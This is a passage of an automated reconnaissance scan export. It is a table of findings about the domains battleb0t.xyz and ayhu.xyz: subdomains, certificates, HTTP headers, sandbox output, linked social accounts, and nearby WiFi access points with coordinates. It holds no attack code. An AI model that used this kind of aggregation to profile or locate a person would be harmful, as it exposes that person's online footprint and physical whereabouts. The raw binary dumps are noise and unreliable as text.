00000000-00005804]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\5804_345640691\\Filtering Rules]- [targetUID: 00000000-00005804]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5804_613645668\\edge_driver.js]- [targetUID: 00000000-00005804]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5804_613645668\\vendor.bundle.js]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00005804]\n "c4f2a21b-1d0c-4869-a5c9-82d03712e897.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 52082"- Location: [%TEMP%\\c4f2a21b-1d0c-4869-a5c9-82d03712e897.tmp]- [targetUID: 00000000-00005804]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5804_613645668\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00005804]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00005804]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00005804]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5804_613645668\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00005804]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\5804_613645668\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00005804]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5804_613645668\\Mini-Wallet\\miniwallet.bundle.js]- [targetUID: 00000000-00005804]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\5804_613645668\\Notification\\notification.bundle.js]- [targetUID: 00000000-00005804]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00005804]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\5804_345640691\\Filtering Rules-AA]- [targetUID: 00000000-00005804]\n "000014.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000014.ldb]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00005804]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft | 185.199.108.153 |
| 2023-05-12 02:44:12 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=GB,ST=Greater Manchester,L=Salford,O=Sectigo Limited,CN=Sectigo RSA Domain Validation Secure Server CA | kekw.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | adrilankha (Net ID: 00:06:25:66:F5:F2) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 125.97.148.34.bc.googleusercontent.com | 34.148.97.125 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 0.church | 185.199.111.153 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01001101ck.github.io]
https://www.openphish.com/feed.txt | 01001101ck.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CarlsJr_Wireless (Net ID: 00:0C:42:6B:5A:82) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:58:30 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://southgate.ai/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_8a8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_8a8_IESQMMUTEX_0_519"\n "IsoScope_8a8_IE_EarlyTabStart_0xb94_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_8a8_ConnHashTable<2216>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2216"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_8a8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_8a8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1513.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar14E2.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.164.10:443"\n "142.250.31.95:443"\n "104.16.87.20:443"\n "142.250.188.200:443"\n "34.74.170.74:443"\n "142.251.163.94:443"\n "172.253.122.155:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "ACP1XSAW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ACP1XSAW.txt]- [targetUID: 00000000-00002216]\n Dropped file: "E1RPTRSJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E1RPTRSJ.txt]- [targetUID: 00000000-00003504]\n Dropped file: "6SDWGML8.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6SDWGML8.txt]- [targetUID: 00000000-00003504]\n Dropped file: "TOQ8R1LZ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TOQ8R1LZ.txt]- [targetUID: 00000000-00003504]\n Dropped file: "8AFC20ZQ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8AFC20ZQ.txt]- [targetUID: 00000000-00003504]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1512.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab14E1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "latex.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003504]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "vendor-bundle.min.c7b8d9abd591ba2253ea42747e3ac3f5_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "instantsearch.production.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "~DF4ED835C2140DC3C0.TMP" has type "data"- Location: [%TEMP%\\~DF4ED835C2140DC3C0.TMP]- [targetUID: 00000000-00002216]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._5E4C1B7D-7577-11ED-BDC3-080027DA0E36_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF52C41F7A5B885E2E.TMP" has type "data"- Location: [%TEMP%\\~DF52C41F7A5B885E2E.TMP]- [targetUID: 00000000-00002216]\n "JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCuM70w9_1_.woff" has type "Web Open Font Format TrueType length 51152 version 1.1"- [targetUID: N/A]\n "_692F3876-7577-11ED-BDC3-080027DA0E36_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "GC2JP03J.htm" has type "HTML document UTF-8 Unicode text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\GC2JP03J.htm]- [targetUID: 00000000-00003504]\n "logo_hud805459e1585bd759bb2db1da4556ab3_12226_0x70_resize_lanczos_3_1_.png" has type "PNG image data 560 x 70 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DF58E90E44EE511DCA.TMP" has type "data"- Location: [%TEMP%\\~DF58E90E44EE511DCA.TMP]- [targetUID: 00000000-00002216]\n "netlify-identity-widget_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "saioutcome1-poster_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 1248x702 components 3"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "cookieconsent.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://southgate.ai/"\n Pattern match: "https://southgate.ai"\n Heuristic match: "cdn.jsdelivr.net"'}], u'threat_level': 0, u'size': None, u'job_id': u'638f679fb1d2070160672c24', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'172.67.164.10', u'142.250.31.95', u'104.16.87.20', u'142.250.188.200', u'34.74.170.74', u'142.251.163.94', u'172.253.122.155'], u'sha256': u'c4919dc5ebcf054490c8ebabbb453b631c7d016ba87624dd98df4535c94ee593', u'sha512': u'416295b19343a55ad008e5d040d557f23faa8f3f408a08b705180cabac4cc0f2c7ac041b85ea2bfe88c7898028eba01fbc354b9a3a5a87f71af169b394978ae3', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://southgate.ai/', u'submission_id': u'638f679fb1d2070160672c25', u'created_at': u'2022-12-06T16:02:39+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T16:02:39+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 7, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'5ee7036b0ff5a48e7c65fdf244332b48', u'network_mode': u'default', u'processes': [], u'sha1': u'db6bec1322306bff607b711410ce9b65d4a08a9d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, | 34.74.170.74 |
| 2023-05-12 02:44:08 | Internet Name | No | CertSpotter | 33 | 0 | 1 | 0 | None | funny.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.28): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:25 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 2 | 0 | 2 | 0 | None | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:53:07 GMT", "x-nf-request-id": "01H06Y2Y8V02FJ2S9V869KY74K", "content-type": "text/html; charset=UTF-8", "age": "73"} | funny.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5eb92eaeff3814-FRA
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | rsi (Category: gaming)
https://robertsspaceindustries.com/citizens/ayhu | ayhu |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 03:01:26 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi2.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi2.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] | nwapi2.battleb0t.xyz |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/battleb0t | battleb0t |
| 2023-05-12 02:44:09 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 | ayhu.xyz |
| 2023-05-12 03:24:22 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:12 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Nginx | kekw.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AOSS-DESKTOP1-47290 (Net ID: 00:00:5C:81:7F:C0) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.244): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:66:97:3D) | 50.1188, 8.6843 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5913389a552a51-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.253): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:30 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | Germany, Hesse, Frankfurt am Main | 46.101.229.70 |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 03:33:45 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
? `sm
b"0N9
3@N:vn
yj4BZu:-
pqmVU
hEC0s
c@ h'
6FcPkh4
2:Eu`
IDAT
nfwPH
jniEDkf
9uCGxN
MWFGv
'!hXQf
6WoW'
hRoWW
68ZQ$
8Ro7Tr
2j3yrN
nkumI'N
rVKjW
icsI3
dc:YL
JU5sF
O::vH
BlH_0
xHnU6
:9sGc
LB7R1
\T.sL
T.TM`
/kyyE
NjttD
Z \$@
_495P
trtT'cq
yf4:6
5?O@nY
.LRMj9o
dx.>_
"P/9l
1i5b>
d<'uj
JG077/
4NmT4 2
2d9L
B?mju
VWom
<F0b-R
PMc7d6d?
Z`sX10
tXB0Zn
blFM!
FpL3K
0o!Sc
6DfD0
IDATG`
D2Yi2e
wgxsu.
sx<C3
P?AF5
N1dcyzL
6dT\D
xTPT'
" mE\
DpW-Q
8NZeS
SIc@x
oJj'sN??
``xvl
BR8Jtu
waVm'
8 Jkd
55j1T
i5Vn
heH_>
yy60A
j1ENS
uHcBj
VCAKa
v-v7i
T/T.lF
IDAT>
5zqxE?
dUJ77
8_seE
"gJs5UxZ
p9Rn:
f2`q?
r4SvF
05sFG-
7mecE
`tNP6
><HQT
s9v54
!c>0
MRmC"
Pp@e9_ | https://pics.battleb0t.xyz/images/ein_2.png |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5b59d17bc80231-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DONNYMC (Net ID: 00:09:5B:CF:7C:14) | 39.0469, -77.4903 |
| 2023-05-12 02:44:44 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | Cloudflare | vscode.battleb0t.xyz |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.177): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.133): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
